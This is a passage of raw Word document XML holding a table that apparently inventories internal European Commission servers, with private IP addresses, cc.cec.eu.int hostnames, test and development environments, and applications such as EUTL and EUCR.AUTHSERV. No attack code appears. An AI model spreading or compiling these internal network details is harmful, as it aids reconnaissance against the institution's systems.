            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>EUTL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A550F8" w:rsidRPr="001019D3" w14:paraId="700959C3" w14:textId="199EDAB6" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="307E62DD" w14:textId="4EB0DF19" w:rsidR="00A550F8" w:rsidRPr="001019D3" w:rsidRDefault="00A550F8" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10.130.180.159</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7044BC98" w14:textId="279F6382" w:rsidR="00A550F8" w:rsidRPr="001019D3" w:rsidRDefault="00A550F8" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>wlstd03803.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="36D014DF" w14:textId="28B93E95" w:rsidR="00A550F8" w:rsidRPr="001019D3" w:rsidRDefault="00A550F8" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CLIMA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="818" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="0A609DBD" w14:textId="65A29120" w:rsidR="00A550F8" w:rsidRPr="001019D3" w:rsidRDefault="00A550F8" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1496" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7E3937BA" w14:textId="28A65EE7" w:rsidR="00A550F8" w:rsidRPr="001019D3" w:rsidRDefault="00A550F8" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>EUTL PUBLIC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A550F8" w:rsidRPr="001019D3" w14:paraId="7966E6D9" w14:textId="741BE2F0" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="4DD05FCC" w14:textId="33C140B4" w:rsidR="00A550F8" w:rsidRPr="001019D3" w:rsidRDefault="00A550F8" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>10.130.181.240</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F2F9879" w14:textId="6FAF9D8E" w:rsidR="00A550F8" w:rsidRPr="001019D3" w:rsidRDefault="00A550F8" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>wlstd04192.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="6E32109E" w14:textId="3F3C3092" w:rsidR="00A550F8" w:rsidRPr="001019D3" w:rsidRDefault="00A550F8"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2E3F70C4" w14:textId="03201EBE" w:rsidR="00A550F8" w:rsidRPr="001019D3" w:rsidRDefault="00A550F8"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6CDE0181" w14:textId="0248205D" w:rsidR="00A550F8" w:rsidRPr="001019D3" w:rsidRDefault="00A550F8" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>EUTL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00710241" w:rsidRPr="001019D3" w14:paraId="0B070628" w14:textId="1BEC967F" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="3A3241FC" w14:textId="2F1533C3"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10.130.134.110</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C5EDB17" w14:textId="6125B3E0"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wlstd04204.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="50D97602" w14:textId="7E728877"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7096FC7B" w14:textId="0AEA333F"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5E563783" w14:textId="55BCAEA9"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EUTL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00710241" w:rsidRPr="001019D3" w14:paraId="0ABFC725" w14:textId="2C9C9154" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="4C04E534" w14:textId="3FB1FDEA"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10.130.141.112</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="073015AE" w14:textId="43983780"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wlstd03448.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="72692BDB" w14:textId="4195F33B"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7F274F01" w14:textId="30A0EE15"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0D801D35" w14:textId="28DA78B1"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EUCR.SD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00710241" w:rsidRPr="001019D3" w14:paraId="55E25527" w14:textId="06ED3DFE" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="2A003793" w14:textId="1A6030C2"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10.130.139.85</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2668C3B3" w14:textId="38C4DE75"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wlstd03446.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="538EB863" w14:textId="7396F05D"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3107C70B" w14:textId="00901307"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566FF48A" w14:textId="3236B51B"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EUCR.SD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00221B72" w:rsidRPr="001019D3" w14:paraId="13909259" w14:textId="200545F9" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="4AF1C19E" w14:textId="553BD435"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10.130.140.59</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A26C07C" w14:textId="49CACE13"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wlstd03376.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="4FF86892" w14:textId="045082E7"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480A16B0" w14:textId="1FBA7CC9"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055A3442" w14:textId="5051EC95"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EUCR.AUTHSERV</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00710241" w:rsidRPr="001019D3" w14:paraId="56CA85A6" w14:textId="7093706F" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="33E0DEC9" w14:textId="48E51ED4"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10.130.132.192</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5818744D" w14:textId="5D43A9DA"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wlstd03052.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="644B2E24" w14:textId="07D7FB92"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368E0487" w14:textId="03DACEAF"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634D55D2" w14:textId="7C37BD5A"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683DAAC5" w14:textId="28E2511A" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="388D57F2" w14:textId="0AA28AC9"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10.130.141.198</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74AAA6B7" w14:textId="2412A10B"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wlstd04182.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="3D34912A" w14:textId="79B8F052"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075E51C6" w14:textId="46E86503"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0D4E16EF" w14:textId="5C77FB3B"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662AF61D" w14:textId="07D2830E" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="6CA976A2" w14:textId="55D941A0"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10.130.139.168</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A7E6DD1" w14:textId="3BF993F2"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wlstd04183.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5648AA12" w14:textId="70AD710B"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1B0B8AC3" w14:textId="48D6B3CC"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31FA545A" w14:textId="6FBC7C3D"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03CA387C" w14:textId="6B82D73C" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="73220BF0" w14:textId="123267D7"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10.130.137.206</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A63FEE9" w14:textId="7F7B5235"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wlstd03051.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="79D9483E" w14:textId="390DC9FE"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6BFC0C30" w14:textId="610AF029"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15881122" w14:textId="7BAC3B65"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4A4E15C6" w14:textId="20061467" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="7E29C37B" w14:textId="430C2C08"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10.130.176.251</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26D62BA8" w14:textId="79BA5D32"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wlstd03094.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0DCB8915" w14:textId="7D963156"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3E91ABA5" w14:textId="05EF98EC"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24497F19" w14:textId="53CA3FC5"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18488CE2" w14:textId="329DA718" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0194DCDF" w14:textId="1020A775"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10.130.130.43</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72D39D8F" w14:textId="53255717"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wlstd03378.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="1CC2438A" w14:textId="5A8AFF05"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4A7E28A2" w14:textId="216651B6"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6520025B" w14:textId="6D59865C"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0EC0A58F" w14:textId="18075792" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="19316B26" w14:textId="1A7AD177"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10.130.141.60</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7858BEC5" w14:textId="6460E475"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wlstd03379.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="6A45CC35" w14:textId="74294553"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7224A98A" w14:textId="6E5585C6"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6CB72ED7" w14:textId="61F9EA40"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710241" w:rsidRPr="001019D3" w14:paraId="3EBB0D98" w14:textId="4A8CCDCA" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="47FFE841" w14:textId="1EACD7F8"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10.130.140.78</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="723F2879" w14:textId="7F0D2D39"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wlstd03382.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="39ACB5E4" w14:textId="378CD094"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3C5BA021" w14:textId="302A94C2"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16BF9694" w14:textId="6C99ABE4"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EUTL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00710241" w:rsidRPr="001019D3" w14:paraId="710469B0" w14:textId="4F005739" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5B9EAF0D" w14:textId="66F107F2"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10.130.176.73</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AEA1F50" w14:textId="46709200"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wlstd03096.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="4C7552A0" w14:textId="679DD2AE"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7B942FAE" w14:textId="2CA83E65"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tcPr>
          <w:p w14:paraId="5B1F0D08" w14:textId="4D6E72B8"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221B72" w:rsidRPr="001019D3" w14:paraId="4F985A4A" w14:textId="5143D840" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="4CB40508" w14:textId="73833967"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10.130.176.116</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23905F5D" w14:textId="4586023B"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wlstd03088.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="45C4D949" w14:textId="41105DDC"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41C27DFC" w14:textId="2BEDA541" w:rsidR="00710241" w:rsidRPr="001019D3" w:rsidRDefault="00710241" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>Development</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="32CC021E" w14:textId="56E96A68"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00221B72" w:rsidRPr="001019D3" w14:paraId="7F7055B5" w14:textId="5779FDD5" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="61CCB1C8" w14:textId="5EF0A6B3"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10.130.138.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2190CD9A" w14:textId="6E014CE7"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wlstd03375.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="7E67339D" w14:textId="42F01C00"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7B484FF1" w14:textId="106EFD00"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7E0BB269" w14:textId="0CECAA0B" w:rsidR="00710241" w:rsidRPr="001019D3" w:rsidRDefault="00710241" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>EUCR.AUTHSERV</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00221B72" w:rsidRPr="001019D3" w14:paraId="0DBC9DA2" w14:textId="21C864C7" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="4CE4D54F" w14:textId="65E35BCC" w:rsidR="00710241" w:rsidRPr="001019D3" w:rsidRDefault="00710241" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>10.130.134.94</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56F38182" w14:textId="2F085A38"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wlstd02730.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="61B998F8" w14:textId="6E79F0EE"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66E97C87" w14:textId="571CCB74"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1FCED8DF" w14:textId="06B5F7B0" w:rsidR="00710241" w:rsidRPr="001019D3" w:rsidRDefault="00710241" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:color w:val="030F1A"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:lang w:eastAsia="en-IE"/>
              </w:rPr>
              <w:t>CH-TI.CHL-VALIDATION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00221B72" w:rsidRPr="001019D3" w14:paraId="0E77705B" w14:textId="5D62ADCA" w:rsidTr="00221B72">
        <w:trPr>
          <w:trHeight w:val="227"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="876" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="57C13CD7" w14:textId="79BE79AC"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10.130.139.51</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1314" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23873DF4" w14:textId="32E86A46"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wlstd02729.cc.cec.eu.int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="496" w:type="pct"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="13F70C62" w14:textId="1941D2E7"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157E7C6F" w14:textId="0D44A8BC"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2DB202DD" w14:textId="1E09EC58" w:rsidR="00710241" w:rsidRPr="001019D3" w:rsidRDefault="00710241" w:rsidP="00710241">
            <w:pPr>
              <w:spacing w:after="0" w:afterAutospacing="0"/>
              <w:ind w:left="57" w:right="57"/>
